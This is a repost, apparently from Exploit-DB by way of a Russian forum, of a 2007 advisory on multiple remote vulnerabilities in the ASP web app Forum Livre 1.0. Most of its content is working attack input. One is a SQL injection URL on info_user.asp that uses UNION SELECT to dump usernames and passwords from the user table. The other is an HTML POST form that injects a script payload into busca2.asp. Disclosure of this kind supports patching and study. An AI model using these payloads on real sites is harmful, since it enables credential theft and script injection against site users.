- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3197
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2007-0590 cve-2007-0589
- Дата публикации
- 2007-01-25
Код:
*******************************************************************************
# Title : Forum Livre 1.0 Multiple Remote Vulnerabilities
# Author : ajann
# Contact : :(
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
Login Before..->
http://[target]/[path]//info_user.asp?user=[SQL]
Example:
//info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario
[[/SQL]]
[[XSS]]]---------------------------------------------------------
Login Before..->
http://[target]/[path]//busca2.asp (POST Method) [SQL]
Example:
<form method="POST" action="http://[TARGET]/[path]/busca2.asp">
<input type="text" name="palavra" value="[#]XSS HERE[#]">
<input type="radio" value="all" name="tipo" checked>
<input type="radio" value="some" name="tipo">
<select size="1" name="forum">
<option value="">Todos os fóruns</option>
<option value="">Fórum ComCatz</option>
<input type="submit" value="Investigar" name="B1">
</form>
[[/XSS]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-25]- Источник
- www.exploit-db.com
